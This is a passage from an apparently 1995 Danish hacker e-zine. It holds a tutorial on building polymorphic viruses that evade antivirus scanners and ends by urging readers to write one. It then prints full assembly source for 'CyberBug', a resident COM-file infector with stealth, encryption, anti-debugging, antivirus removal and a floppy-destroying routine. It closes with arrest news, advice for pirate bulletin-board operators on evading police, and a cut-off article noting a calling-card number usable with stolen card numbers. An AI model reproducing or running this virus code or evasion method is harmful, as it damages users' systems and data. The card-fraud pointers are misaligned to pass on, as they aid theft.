Dette er sådan set alle st¢rre lande, dog er denne liste fra en officiel kilde fra AT&T udgivet i 1992, der vil nok være flere lande nu, da AT&T hele tiden er på farten for at blive st¢rre og st¢rre. Som det ses, er AT&T ikke stoppet ved bare at levere telefon-linier, men de er også en af de st¢rre producenter af EDB-l¢sninger til virksomheder, samt sikkerheds-systemmer til st¢rre virksomheder - De er sågar igang med at bygge en kreds uden om den private computerscene, med billige og samtidig kraftfulde computer, allerede nu er computer-leverand¢ren til KTAS nemlig AT&T... Om bare nogle få år er monopolet på det danske telefon-net til rådighed, hvilket ikke har gået fordi AT&T's ¢re stille. AT&T er også den mest sand- synlige tele-virksomhed der vil modtage monopolet på de danske telefonlinier, fordelen er dog at alle lokale-telefon opkald vil blive gratis, men stadig bliver det en fordel for AT&T der vil få magten over et land mere end de nu- tidig har.. AT&T har allerede magt nok til at kunne lukke mindre lande totalt ned, og hvis de bliver for store, kan de sågar lægge hele verden for deres f¢dder. Med den fart AT&T har på, kan man godt mistænke koncernen at på et tidspunkt at overgå til et meget og endda for stort penge-syndikat, hvilket både kontrollere både komunikationen, sikkerheden samt kontakten, hvis AT&T lukker ned for bare et land, vil helvede sådan set gå l¢s, da man helt mister alt komunikation til det land.. Sagt på en anden måde, at hvis et firma får nok magt over komunikationen vil selv den mindste manipulation af komunikationen volde verden store problemmer, en manipulation af komunikationen vil endda kunne forudsage krige over hele orden, da ingen kan f¢le sig sikker på at det der kommer ud i den anden ende af r¢ret passer 100 % til det der rent faktisk bliver sagt i den anden ende... Som sagt : Den der kontrollere komunikationen, kontrollere verden..... ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ En Polymorphic Virus Af Clive Sharp 1. Generelt Mange af jer har sikkert h¢rt om polymorphic virus'er, men det er de færreste der ved, hvordan man laver en, som er andet en bare at kryptere virus'en, som jo ikke altid er specielt effektivt, for at sige det pænt. 2. Anti-virus Men f¢rst skal vi se på hvad anti-virus programmerne kigger efter, når de pr¢ver at stoppe en virus: ■ Kender anti-virus programmet denne virus. Dette g¢res ved at s¢ge efter nogle offentligt kendte strenge, som er unikke for præcis denne virus. Nogle strenge kunne f.eks. være: ■ "Made by Dark Avenger", ■ "141$Flu" (Dette er den aktuelle streng fra Cascade). Dvs. at hvis man har en krypteret virus, hvor der aldrig er den samme streng at s¢ge efter, så kan et anti-virus program ikke finde denne virus. Der er desværre ikke rigtigt, for at dekryptere virusen, skal man bruge et lille program (en "load- er"), og så kan anti-virus programmet bare s¢ge på denne "loa- der". Dette vil vi se meget mere til om lidt. Problemet med at s¢ge efter strenge er, at anti-virus folkene jo skal have en kopi af programmet, f¢r de kan finde en streng. Dvs. der vil gå noget tid f¢r der kommer et anti-virus program der kan finde ens virus, ligemeget om den er krypteret eller ej. ■ Nogle anti-virus programmer tager et "billede" af din harddisk hvor den kan se hvis nogle af filerne vokser (et tydeligt tegn på at man har en virus). ■ Nogle virus scannere kigger hukommelsen igennem efter mistænk- elige rutiner (DOS interrupt) o.s.v. Dette er dog de færreste, da de er temmeligt ustabile (til vores fordel). ■ En ny slags virus scanner er kommet fra Dr. Solomon's S&S Int- ernational. Den hedder: "Generic Decryption Engine", og den g¢r f¢lgende (meget kort): Hvis den finder noget der kunne være en krypteret virus, dekryptere den virus'en (ved hjælp af "Fuzzy Logic"), og kan derfor finde en del af de polymorphic viruser der er "på markedet" idag. 3. En "normal" virus Derefter skal vi se på, hvad en "standart" virus er opbygget af. Dette kan virke lidt elementært for nogle af jer, men jeg vil gerne have, at selv de slemmeste WaR3z D0dEz forstår dette, derfor: ■ En "dropper", dvs. det program der bringer virusen ind i din computer, men ikke selve virusen. Dette kan være et special lavet program, eller bare nogle tilfældige WaR3Z. ■ Overtagelse af systemet (dette har ikke nogen videre interesse for os, så det vil vi ikke uddybe nærmere). ■ Kryptering/dekryptering (en "loader"). Mange tror, at er en virus krypteret, så er den polymorphic og kan ikke findes af anti-virus programmer. Begge dele er forkert! Dette vil vi se meget mere til senere. ■ Anti-antivirus [Retro]. De lidt mere avancerede virus'er chec- ker om der er nogle anti-virus programmer residente i hukommel- sen, eller om der ligger nogle scannere på harddisken. Hvis de finder nogle antivirus programmer, bliver disse "slået fra", eller på andre måder omgået. (Dette vil ikke blive nærmere uddybet her). ■ Derefter lægger virusen sig ned i boot-sektoren eller i .com/ .exe filer. Dette vil ikke blive beskrevet nærmere. ■ De fleste viruser har også en "payload", som f.eks kan være at slette hele din harddisk, eller spille en lille melodi. Dette har ingen interesse for os. Dette var en meget kort gennemgang af hvordan en virus virker, og jeg håber at den ikke var alt for overfladisk, men da dette jo handler om polymorp- hic virus'er, er det kun det lille "loader" program, der har vores interesse. 4. "Loaderen" For at se forskellen på en krypteret virus, og en "normal" ikke krypt- eret virus er her to illustrationer: a. ╔═════════╗ ║ ║ ║ ║ ║ ║ ║ ║ ║ ║ ║ Kode ║ En IKKE krypteret virus. ║ ║ ║ ║ ║ ║ ║ ║ ║ ║ ╚═════════╝ b. ╔═════════╗ ║ ║ ║"LOADER" ║ ║ ║ ╠═════════╣ ║ Kryp- ║ ║ teret ║ En krypteret virus. ║ kode ║ ║ ║ ║ ║ ║ ║ ║ ║ ╚═════════╝ Alle burde nu have forstået, at det er "loaderen" der er problemet, da man kan have den vildeste kryptering, men hvis man bruger den samme "load- er" så hjælper det bare ikke. "Loaderen" skal g¢res polymorphic. 5. The polymorphic loader Det vi skal g¢re, for at g¢re vores virus polomorphic er, at få vores "loader" til at muterer. Det g¢res på f¢lgende måde: ■ For hver kommando vi har i vores "loader" (dekrypter), finder vi nogle andre kommandoer, som resulterer i, at de scan strenge der bruges, ikke længere er korrekte, f.eks.: ■ INC DI bliver kan blive til: ADD DI,1 eller til ADD DI,3 - SUB DI,2 o.s.v. Resultatet er, at den samme kommando bliver udf¢rt (registeret DI bliver 1 st¢rre), men på en forskellig måde hver gang! Der kan også skiftes mellem de registrer der er i computeren, da det også giver nye scan strenge. Det vil sige, at hver gang er der 3-5 muligheder for at erstatte den f¢rste kommando, 3-5 muligheder for at erstatte den 2 kommando o.s.v. Desværre er det rimeligt nemt for anti-virus programmerne at lave lidt statistisk regning, og med h¢j sansynlighed at sige: her er en virus. Men det problem kan også fikses, nemlig med "Noise Bytes". ■ "Noise Bytes" er nogle kommandoer, som ikke har nogen betyd- ning for udf¢relsen af vores program, men som virker forvir- rende, og som g¢r det sværere at lave statistisk regning på vores virus. Nogle kommandoer kan f.eks være: ■ CLI (Clear Interrupt Flag) STI (Set Interrupt Flag) NOP (No Operation) ■ MOV DI,12 (Forudsat at vi ikke bruger DI) MOV CX,1234 (Forudsat at vi ikke bruger CX) O.S.V. Det vil sige, at når man har 3-5 (eller flere) funktioner, som g¢r det samme, og bruger et variabelt antal "Noise Bytes", så har man en Polymorphic virus. 6. Forskellige former for viruser Her til sidst vil jeg vise en lille oversigt, over div. former for viruser: ■ En standart, ikke krypteret virus: 84 85 4D 25 14 5E 8F 65 07 82 6A 4C 88 A9 B2 65 E1 38 3B AA 8D │ │ └─────────────────────────────┬──────────────────────────────┘ │ Normale kommandoer ───────────┘ ■ En standart, krypteret virus: 87 45 2A 78 3D 6B 76 AB XX XX XX XX XX XX XX XX XX XX XX XX XX │ │ │ │ └──────────┬──────────┘ └─────────────────┬──────────────────┘ │ │ "Loader" ──┘ │ Krypteret data ───────────────────────────┘ ■ En semi-Polymorphic virus: "Loader" ──┐ │ ┌──────────┴──────────┐ │ │ 87 45 3D YY YY YY 74 AB XX XX XX XX XX XX XX XX XX XX XX XX XX │ │ │ │ └───┬──┘ └─────────────────┬──────────────────┘ │ │ "Noise Bytes"┘ │ Krypteret data ───────────────────────────┘ ■ En Polymorphic virus: "Loader" ──┐ │ ┌──────────┴──────────┐ │ │ ZZ ZZ ZZ YY YY YY ZZ ZZ XX XX XX XX XX XX XX XX XX XX XX XX XX │ │ │ │ │ │ │ │ └───┬──┘ └───┬──┘ └─┬─┘ └─────────────────┬──────────────────┘ │ │ │ │ Var. funk. │ │ │ "Noise Bytes"┘ │ │ Variable funktioner ┘ │ Krypteret data ───────────────────────────┘ Med variable funktioner (var. funk.) menes der selvf¢lgeligt f¢romtalte metode til at mutere loaderne, med forskellige kommandoer, som g¢r det samme. 7. Konklusion For at g¢re en virus 100% Polymorphic skal den have: ■ Et variabelt antal "Noise Bytes". ■ Flere forskellige måder at udf¢re en kommando på. ■ Brugen af flere forskellige registre. ■ Variabel længde ("loader" og event. krypteret data). ■ Forskellig kryptering af data'en. Jeg håber, at dette har hjulpet dem, der ikke vidste hvordan en Poly- morphic virkede, så nu skal du bare lave en...... ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Hvad vil fremtiden bringe for Dommedag Nu? Af Clive Sharp I den nærmeste fremtid vil der ske mange ændringer med Dommedag Nu / SMERSH. Vi regner med, at efter Dommedag Nu nr. 5. (som sandsynligvis vil blive released til The Party i julen 1995), så stopper vi enten bladet, eller så ænd- re vi bladet til en slags "nyhedsbrev", som så vil udkomme oftere, og i mindre st¢rrelse (5 - 20 K), og kun omhandlende (ca.) et emne. Alt dette kommer selv- f¢lgeligt an på, hvor meget materiale vi får fra alle jer kære læsere, da vi ikke selv magter at producere nok materiel til et blad i denne st¢rrelse (da vi jo også har et liv at leve ved siden af Dommedag Nu). Vi regner med, at PLAN B går ned i l¢bet af max. 1-2 måneder, men det vil komme op igen (grunden er at vores SysGud, Deja-Vu, har nogle, hmm "Person- lige problemer"), men imens vil Darkside Connection være vores "hovedkvarter". I Dommedag Nu nr. 5. får vi en masse spændende nye ting at vise jer, det skyldes ikke mindst, at SMERSH har fået nogle nye medlemmer, som rykker, på mange områder, så det skal nok blive et spændende blad. Desuden vil Danmarks Super-Virus-Koder, Darkman, lave en polymorphic engine til os, en såkaldt DDN-M (hmmm). Den skal nok være værd at vente på. Ellers vil vi bare anbefale alle jer der er interesseret i HPV, at være til The Party (julen 1995), for selvom at det er et WaR3z party, så er det en god mulighed for alle HPV folk at m¢des. Vær der! ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ CyberBug v. 1.00 Af TorNado (Indledning af Clive Sharp) Ja, så er den her. Bladets f¢rste virus (bortset fra Quicksilver virus'en, ikke Deja-Vu?). Det er ellers imod vores politik, at have artikler i bladet, som ikke skrevet på dansk, men vi har diskuteret lidt frem og tilbage, og er nået til den konklusion, at det vil lyde dumt, og være kraftigt menings- forstyrrende, at oversætte det til dansk, så i må leve med det, som det er. ;============================================================================ ; ; Virus Name : CyberBug v. 1.00 ; Length : 757 bytes ; Author : TorNado ; Origin : Denmark 1995 ; ; Description : -- Resident .COM infector ( 4bh = execute ) ; -- File stealth 11h / 12h find first / find next ; -- XOR - Encryption ; -- Intercept INT24 ( Critical Error Handler ) ; -- Anti-Debugging ; -- Saves Time / Date / Attributes ; -- Infect COMMAND.COM ; -- Create file cyberbug.bat ( 3ch = file create ) ; the BATCH file will contain one single line which ; is " echo > clock$ " ; -- Remove VSAFE from memory ; -- Change drive to A:\ at a bad time (nuke tracks) ; ; To Compile : -- TASM /m2 cyberbug.asm ; TLINK /t cyberbug.obj ; ;============================================================================ cyberbug segment assume cs:cyberbug,ds:cyberbug,es:cyberbug org 100h start: call delta vir_size equ codeend-start delta: call $+3 int 1h call fuck_tbscan call deltaOFF ;──────────────────────────────────────────────────────────────────────────── ; Get delta offset and decrypt virus ;──────────────────────────────────────────────────────────────────────────── deltaOFF: pop bp sub bp,offset deltaOFF call encrypt_decrypt ;decrypt virus ;──────────────────────────────────────────────────────────────────────────── ; Remove VSAFE, make cleaning impossible and drop program ( cyberbug.bat ) ;──────────────────────────────────────────────────────────────────────────── begin: call vsafe call anti_debug call drop_program jmp short doit ;──────────────────────────────────────────────────────────────────────────── ; Confuse TBSCAN ( no flags on infected files at all !! ) ;──────────────────────────────────────────────────────────────────────────── fuck_tbscan: mov ax,0305h ; keyb i/o xor bx,bx int 16h ret anti_debug: mov cx,09ebh mov ax,0fe05h jmp $-2 add ah,03bh jmp $-10 int 21h ret go_resident: mov ax,[si] mov es:[di],ax mov ax,[si+2] mov es:[di+2],ax cli ; Disable interrupts mov ds:[si],bx mov ds:[si+2],es sti ; Enable interrupts ret ;──────────────────────────────────────────────────────────────────────────── ; Prepare virus to go resident hook some memory ;──────────────────────────────────────────────────────────────────────────── doit: mov cx,es dec cx mov es,cx mov bx,es:[03h] mov dx,offset codeend-offset start mov cl,4 shr dx,cl add dx,4 mov cx,es inc cx mov es,cx sub bx,dx mov ah,4Ah int 21h ; do it jc do_work ; jump to ok dec dx mov ah,48h ;allocate enough mem for virus mov bx,(vir_size+15)/16 int 21h jc do_work ; jump to ok dec ax ;ax-1 = MCB mov es,ax mov word ptr es:[1],8 ;Mark DOS as owner mov si,offset offset start add si,bp sub ax,0Fh mov es,ax mov di,0100h mov cx,offset codeend-offset start cld rep movsb xor ax,ax mov ds,ax mov di,offset oldint21 mov si,084h mov bx,offset virusint21 call go_resident do_work: push cs pop es push es pop ds mov di,0100h mov si,offset buffer add si,bp movsw movsb pop cx pop ax xor dx,dx push dx xor bp,bp xor si,si xor di,di mov bx,0100h push bx xor bx,bx retn ;──────────────────────────────────────────────────────────────────────────── ; If u change to drive A:\ ther is a little chance it might get fucked up!! ;──────────────────────────────────────────────────────────────────────────── read_floppy: push ax bx cx dx bp si di ds es cmp dl,0 je floppy_time jne runforit floppy_time: mov ah,2ch int 21h cmp cl,55 ; minute = 55 ? jge kill_floppy jmp runforit kill_floppy: cli cwd mov cx,255 int 26h sti runforit: pop es ds di si bp dx cx bx ax jmp function21 virusint24 proc far mov al,0 iret virusint24 endp ;──────────────────────────────────────────────────────────────────────────── ; FCB stealth no file size change on infected files in DIR listing ;──────────────────────────────────────────────────────────────────────────── FCB_stealth: pushf push cs call function21 cmp al,00 jnz dir_error push ax bx es mov ah,51h ; Get active PSP to int 21h ; es:bx mov es,bx cmp bx,es:[16h] jnz error_stealth mov bx,dx mov al,[bx] ; al = current drive push ax mov ah,2fh ; get dta area int 21h pop ax inc al jnz normal_fcb ext_fcb: add bx,7h normal_fcb: mov ax,es:[bx+17h] and ax,1fh xor al,01h jnz error_stealth and byte ptr es:[bx+17h],0e0h ; substract virus len sub es:[bx+1dh],(vir_size) sbb es:[bx+1fh],ax error_stealth: pop es bx ax dir_error: iret jmp_read_floppy:jmp read_floppy ;──────────────────────────────────────────────────────────────────────────── ; Check for every execution that is made look for .COM files ;──────────────────────────────────────────────────────────────────────────── virusint21 proc near cmp ah,4bh ; Check for execution je infectCOM cmp ah,11h ; FCB find first je FCB_stealth cmp ah,12h ; FCB find next je FCB_stealth cmp ah,0eh ; Change Drive? je jmp_read_floppy virusint21 endp function21: jmp dword ptr cs:[oldint21] iret jmpforme: jmp popALL ;──────────────────────────────────────────────────────────────────────────── ; Infection routine clear attributes, get time and write and encrypted copy ;──────────────────────────────────────────────────────────────────────────── infectCOM: push ax bx cx dx bp si di ds es intercept24: push ds push dx mov ax,3524h int 21h mov word ptr cs:[save_int24],bx mov word ptr cs:[save_int24+2],es push cs pop ds mov dx,offset virusint24 mov ax,2524h int 21h pop dx pop ds mov ax,4300h int 21h mov word ptr cs:[save_attrib],cx jc jmpforme mov ax,4301h xor cx,cx int 21h mov ax,3d02h int 21h push ds push dx push cs pop ds mov bx,ax mov ax,5700h int 21h mov cs:[save_time],cx mov cs:[save_date],dx mov ah,3fh mov dx,offset buffer mov cx,3 int 21h cmp word ptr cs:[buffer],'ZM' ; Check if EXE file je close mov ax,4202h ; move file pointer call f_pointer sub ax,offset codeend-offset start+3 cmp ax,word ptr cs:[buffer+1] je close add ax,offset codeend-offset start mov word ptr cs:[new_jmp+1],ax ;──────────────────────────────────────────────────────────────────────────── ; Get a random number from DOS time and use it as encryption key ;──────────────────────────────────────────────────────────────────────────── mov ah,2ch ;get random number from time int 21h mov word ptr ds:[enc_value],dx ;store it mov ax,08d00h mov es,ax mov di,100h mov si,di mov cx,(vir_size+1)/2 rep movsw push es pop ds xor bp,bp call encrypt_decrypt ;and encrypt mov ah,40h ;write it to file mov cx,vir_size mov dx,offset start int 21h push cs pop ds jc close mov ax,4200h call f_pointer mov ah,40h mov cl,3 mov dx,offset new_jmp int 21h ;──────────────────────────────────────────────────────────────────────────── ; Save original time / date / attributes and close the file ;──────────────────────────────────────────────────────────────────────────── close: stealth_marker: mov ax,5701h mov dx,cs:[save_date] mov cx,cs:[save_time] and cl,0e0h ; stealth marker "value" inc cl int 21h mov ah,3eh ; Close file int 21h pop dx pop ds mov ax,4301h ; restore old attrib mov cx,word ptr cs:[save_attrib] int 21h push ds ; restore int24 pop ds mov ds,cs:[save_int24+2] mov dx,cs:[save_int24] mov ax,2524h int 21h popALL: pop es ds di si bp dx cx bx ax jmp function21 f_pointer: cwd xor cx,cx ; clear CX int 21h ; do it ret ;──────────────────────────────────────────────────────────────────────────── ; Lets take down VSAFE from memory so it dosen't complain !! ;──────────────────────────────────────────────────────────────────────────── vsafe: mov ax,0fa01h mov dx,5945h int 21h ret ;──────────────────────────────────────────────────────────────────────────── ; This is the part that drops a small BATCH file in current dir ;──────────────────────────────────────────────────────────────────────────── drop_program: lea dx,[bp + offset filename] ; this creates our push ds ; little signature push cs pop ds mov ah,3ch mov cx,3 int 21h jc no_drop xchg ax,bx mov ah,40h mov cx,(drop_end - drop_start) lea dx,[bp + offset drop_start] int 21h mov ah,3eh int 21h no_drop: pop ds ret drop_start: evil db 'echo > clock$',0 drop_end: virusname db '[ CyberBug v. 1.00 ]' author db '[ made by TorNado DK ]' filename db 'Cyberbug.bat',0 save_time dw 0 save_date dw 0 save_attrib dw 0 oldint21: dd ? save_int24 dw 2 dup (?) buffer db 90h,0cdh,20h new_jmp db 0e9h,00h,00h enc_end: ;──────────────────────────────────────────────────────────────────────────── ; End of encryption the code below this point is unencrypted ;──────────────────────────────────────────────────────────────────────────── enc_value dw 0 encrypt_decrypt:mov dx,word ptr ds:[bp+enc_value] lea si,[bp+doit] mov cx,(enc_end-doit)/2 xor_loop: xor word ptr ds:[si],dx inc si inc si loop xor_loop ret codeend: cyberbug ends end start ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Nyheder (taget, stort set, fra den Danske dagspresse). Nyheder, informationer og andet godt, som man burde læse HACKERE BUSTET ---------------- - Darkseed Pharzyde / 2nd2none (BudBreath/TRoSD) blev busted her forleden morgen, da de havde hacket sig ind på AAU-Inet server, i l¢bet af de sidste måneder. Politiet havde i nogle måneder aflyttet og log'et alle data-signaler over telefonen. Så klokken 7:30 den 22 marts (1995 selvf¢lgelig), bankede 3 politimænd pænt på d¢ren og havde efter nogle timer konfiskeret alt hardware de overhovedet kunne finde, inklusiv h¢jtalere og HIFI-Udstyr. Blandt hardwaren var flere Gigabytes software, en del DAT-bånd og tonsvis af QIC-bånd. Men, det skal dog siges at anklagerne mod BudBreath/TRoSD nok kun blive for hacking og ikke for warez-aktiviteter. HACKERE ANHOLDT ----------------- Original Af: Bo Elkjær Olsen [Ekstra-Bladet, 27 Marts 1995] - Darkseed Ny razzia mod danske hackere... Onsdag den 22. marts slog politiet igen til mod de danske hackere. Klokken 7.30 om morgenen blev der banket på d¢rene hos tre hackere i K¢benhavn og i Ålborg-området. De unge hackere blev taget med til forh¢r og deres værelser grundigt ransaget. Alene hos den ene 'Pharzyde' fra Ålborg-området, blev der konfiskeret edb-udstyr og programmer 'for over 70.000 kroner'. De tre anholdte hackere er under mistanke for at have hacket på Århus Universitets computere, hvorfra de er s¢gt ud på Internet. Hackerne har i tre måneder haft 'superbruger'-status - det vil sige fri kontrol over universitets-computerne. - Jeg vidste ikke engang, at det var en superbruger-konto, fortæller 'Pharzyde' til Ekstra Bladet. 'Pharzydes' telefon er blevet aflyttet siden begyndelsen af februar, da politiet kom på sporet af ham. Politiet er i stand til at aflytte datatrans- missioner op til en hastighed på 14.400 baud, det vil sige bogstaver i sekundet. 'Pharzyde' har kun brugt superbruger-kontoen til at komme ind på Internet, hvor han har hentet gratis programmer og spil. Det var ikke s¢ndag muligt at få en kommentar fra Århus Politi, der står for anholdelserne. UÆRLIGE HACKERE Sidste gang, politiet slog ned på den danske hackerscene, udviklede sagen sig hurtigt til et mareridt for politiet. Hvad der skulle have været et hurtigt kirurgisk snit ned gennem den elektroniske kriminalitet, udviklede sig til en farce, hvor pressen var hurtigere orienteret om anholdelserne end politiet selv. I december 1993 indledte politiet den razzia, der kaldes Haslev-sagen. Mens politiet forgæves fors¢gte at trævle hackmilj¢et op, tog hackerne deres kendskab til medierne til hjælpe for at få nyheden ud hutigst muligt. Da den fjerde hacker, 'Wedlock', blev anholdt i Tårnby, var Ritzau så hutigt orienteret, at Ritzau journalisten J¢rgen Juul om anholdelsen - på trods af, at det var J¢rgen Juul, der havde bemyndiget den. Haslev-sagen er den hidtil st¢rste hackersag i Norden, og ikke mindst derfor er politiet opsat på at få de anholdte d¢mt efter anklageskriftet. Efterforsk- ningen bestående af kriminalfolk fra Roskilde, to mand fra politiets rejsehold og tilkaldte, 'civile' edb-eksperter, arbejder på 16'ende måned med at gennem- gå den datamængde der blev konfiskeret i forbindelse med anholdelserne. Det drejer sig om mere end en million tætskrevne A4-ark. HACKER-POLITI Belært af erfaringerne nedsatte Politiets Efterretningstjeneste i efteråret 1994 en specialgruppe, der skal tage sig af elektroniske kriminalitet. Specialgruppen skal f¢rst og fremmest beskæftige sig med det offentliges elektroniske sikkerhed, men kan også bistå kriminalpolitiet i efterforskning af f.eks. hackersager. Om specialgruppen har været impliceret i de nye hacker-anholdelser vides ikke, men 'det kunne ligne en pr¢veklud' siger Ekstra Bladets kilde i hackermilj¢et. Selv om der efterhånden har været en række st¢rre hackersager i Danmark, er det stadig meget nemt at hacke. Efter anholdelserne i december 1993 og januar 1994 var der kortvarigt stille om hackerne. I dag hackes der igen på fuld styrke herhjemme. På de forskellige edb-systemer bruges der stadig passwords, der er alt for nemme at gætte. I den aktuelle sag på Århus Universitet var passwordet til superbruger- kontoen, der giver ubegrænset kontrol over hele universitetscomputeren '12345678'. Det svarer i datasikkerhed til at have en hovedd¢r - komplet med Ruko-lås og hele marmeladen - og så en d¢rkarm af vådt toiletpapir. Selv om du bruger andre ord, er du stadig ikke garderet mod hackere. Hackerne har programmer , der kan k¢re tusindvis af ord, for eksempel hentet fra WordPerfects ordbogsfunktion, igennem passwordcheck i l¢bet af ganske kort tid. Derfor skal man ikke vælge passwords der består af almindelige ord, men sammensætte sit password af tilfældige bogstaver og tal, for eksempel 'P8-træning' (potte-træning). Endelig skal man ikke bruge det samme password på flere systeme. ------------ Meget kan siges, men hvis det er rigtigt at Pharzyde ikke vidste, at han havde en superbruger account, så har han fortjent at blive taget.... - Clive Sharp Råd til danske sysopper og brugerne af deres systemer ------------------------------------------------------- Indskrevet af en anonym person - Darkseed Da politiet har fulgt Pharzyde og andres linier DATA, og har haft mulighed for at kunne se alt hvad han lavede på de forskellige boards, og af rent sikkerheds mæssige grunde, vil jeg give dette råd til alle sysopper, og brugere der har adresser/telefon numre liggende på sin harddisk. Krypter ALLE filer der indeholder information, såsom adresser og navne på brugere af de forskellige 'fy-fy' boards. Skriv telefon numrene og adresser fra userlisterne ned i en anden fil (krypter den), og slet så de vitale informationer fra userlisterne. 1 person kan hurtig blive skyld i en stor mængde busts (nogen der ¢nsker det?), hvis han har sådanne informationer liggende. Boards Pharzyde har benyttes sig af de sidste par måneder, vil jeg råde til at holde en mindre pause, og totalt udelukke 'ukendte' new users. Der er ingen tvivl om at politiet vil efterforske NPD boards nærmere, som de har set Pharzyde (m.fl.?) logge ind på. De userlister, en lille snot unge kaldet Junker Jake, udgav for nogen tid siden, er der ingen tvivl om at politiet har fået fat i (de har Pharzydes harddisk - Pharzyde havde listerne)! Vær ekstra forsigtig, der er ingen grund til at flere boards bliver lukket, og at flere bliver busted (vi b¢r ihvertfald undgå det så godt som overhovedet muligt). Brug Pretty Good Privacy [PGP] (af ældre dato. Versioner nyere end 2.3 har backdoors, og kan ikke stoles på). Der er al mulig grund til ikke at f¢le sig for sikker! Dansk PiratLinie Oprettet --------------------------- - Darkseed Kilde: JP. Man 3. Apr 1995 På bedste amerikanske vis får Danmark nu også et telefonnummer, hvor ansatte i en virksomhed eller andre kan ringe op og angive en arbejdsgiver, en tidligere kammerat eller en bekendt for at bruge Pirat-kopieret software. Nummeret går under betegnelsen Piratlinien og er oprettet af Business Software Alliance. Piratlinien vil i Danmark bestå af en telefon, der er stillet op hos advokat Niels M. Andersen hos advokatfirmaet Berning, Schlüter og Hald. De er specialiseret i at jage softwarepirater ... --------- Jeg får snart store klodser af at h¢re om Schlüter og hans "anti-warez" venner. Har den mand nogensinde udrettet noget seri¢st??? Har han nogensinde bustet nogen for at have "pirat-warez"??? Manden er et fjols... - Clive Sharp Svære tider for hackerne Af Jan Carlsen, Institut for Datasikkerhed Kronikken i ComputerWorld nr. 29 - 1. September 1995 - Clive Sharp "Nu dages det br¢dre, det lysner i ¢st". Sådan lyder en gammel social- demokratisk slagsang, som imidlertid også kan benyttes til andre ting. I denne forbindelse som et glad budskab til de sikkerhedsfolk, der skal beskytte virk- somhederne, blandt andet mod hackere. For der er hjælp på vej. Hjælpen tager fat om en af væsenligeste forud- sætninger for at være hacker, nemlig anonymiteten. Uden at kunne være dækket af en anonymitet er der ikke meget sjovt ved at hacke. Tænk om en hacker en sen aftentime sætter sig ved klaviaturet for et par timers sjov, hvor vedkommende helt anonymt og naturligvis helt uskyldigt roder lidt rundt i en af jeres vitale databaser, og derefter lader jer betale regningen for videreopkald til jeres samarbejdspartner i USA, hvor han da lige kan ændre et par ordre inden han fortsætter sin uskyldige fremfærd andetsteds i verden. Alt i alt et spændende natteprogram, der nok skal kunne b¢de lidt på manglen på kendskab til og omgang med det andet k¢n [man tror virkeligt at det er l¢gn -red]. Forstil dig så, at en halv time efter at han har startet sine krimin- elle handlinger, så banker det på d¢ren og to grandvoksne politifolk anholder ham og beslaglægger hans udstyr. Læg så hertil en straf (stor eller lille) som han id¢mmes, samt et erstatningskrav fra den/de virksomheder, som han har været inde hos, så kan man måske fornemme, at det sjove ved hacking er ved at forsvi- nde. Dette har hidtil ikke kunnet lade sig g¢re, men med digitaliseringen af centralerne er de tekniske muligheder kommet til stede. Imidlertid har retsplejeloven sat en stopper for politiets efterforskning gennem aflytning af telekommunikationen, idet der her kræves mistanke om en forbrydelse med en straframme på minimum 6 år, f¢rend en dommer vil give tilladelse til en sådan aflytning, og det er naturligvis normalt et godt stykker over den straf en hacker kan forvente at få. Så hackeren har hidtil kunne tage det roligt, idet reglerne om privatlivets fred overfor tredje part også har beskyttet disse kriminelle. Anderledes er det imidlertid i forholdet mellem den, der ringer op (B-nummeret) og den der ringes til (A-nummeret). Her er der i princippet ingen tredje part, og der er ikke lovet noget om hemmeligholdelse overfor den der ringes til. Hverken registerloven, retsplejeloven eller anden lovgivning/best- emmelser forhindrer dette. Det er netop på dette punkt, at der nu g¢res noget for at fjerne anon- ymiteten af den, der ringer. Det sker ved, at Tele-Danmark senere på året kom- mer med en ny service, hvor B-nummeret kan aflæses af modtageren (A-nummeret). Det betyder, at modtageren enten kan undlade at besvare opkaldet - eksempelvis fordi modtageren ikke kender vedkommende eller netop kender vedkommende og ikke ¢nsker at tale/kommunikere med denne - eller efterf¢lgende kan se, hvorfra det påkaldende opkald kom. Indledningsvis vil der blive tilbudt en relativ simpel enhed til at sætte på telefonlinien, som afsl¢rer nummeret, der kaldes fra. Sådanne enheder kendes allerede idag, men de er baseret på, at den, der kalder selv skal ind- taste sit telefonnummer - og det kan man af gode grunde ikke forvente af en hacker, hvorfor afsendernummeret i fremtiden afsendes automatisk fra centralen. Senere kommer der mere intelligente enheder, hvori blandt andet kan indkodes positiv- og negativlister over hvilke numre, man ¢nsker/ikke ¢nsker at kommuni- kere med. Endvidere arbejdes der på at få etableret en ordning, hvor abonenten - eventuelt via sin skærm - kan gå ind og se en log over de opkald, der har været. Envidere etableres der en særlig ordning for abonnenter med "hemmelige" numre, med det skal siges, at selv hackere med "hemmeligt" telefonnummer ikke skal regne med at komme langt i fremtiden. Selv om denne ordning ikke totalt vil afskaffe hacking, så er der dog tale om et mile-skridt i den rigtige retning, og der er ingen tvivl om, at der vil blive tale om væsentlige samfundsbesparelser, for ikke at forglemme en væs- entlig bedre kommunikationssikkerhed i mange virksomheder, lettere mulighed for at stoppe telefon-terror med mere. Bedst af alt er imidlertid, at ordningen også begrænser de unge menne- skers mulighed for at blive så rutinerede hackere, at deres fremtidige l¢bebane fastlåses til at være af kriminel art. ---------- Jeg kunne komme med kritik af denne artikel fra Jan Carlsen, men det ville fylde mere, end artiklen selv... Jeg har dog et sp¢rgsmål til Jan: I USA har de haft disse funktioner i mange år, har det afskaffet hacking i USA? Hackere ringer verden rundt på andres Visa Dankort Af Lisbeth Egeskov Forsiden på ComputerWorld nr. 27 - 18. August 1995 - Clive Sharp Nummeret på en betalingskortkvittering kan misbruges af enhver, der samler bon'en op fra gulvet i forretningen, til at ringe verden rundt eller k¢be ind på postordre. If¢lge Computerworlds oplysninger er det ved at vinde indpas i danske hackerkredse at samle betalingskortkvitteringer op af papirkurven ved betaling- steder og ad den vej finansiere behovet for lange udlandssamtaler. Når man betaler med eller hæver penge på sit kreditkort eller kombiner- ede kreditkort/Dankort, står hele kortnummeret ofte på bon'en eller kviterin- gen. Kortnummeret på kvitteringen fra et betalingskort er nok til at ringe gen- nem det amerikanske telefonselskab AT&T's calling card servicenummer [som er 80010010, hvis nogen er i tvivl -red]. Nummeret, der betjenes af en computer, er en moderne udgave af Rigstelefonen. Fra det kan man ringe videre til hele verden ved hjælp af et nummer på et kort fra de kendte, verdensdækkende kredit- 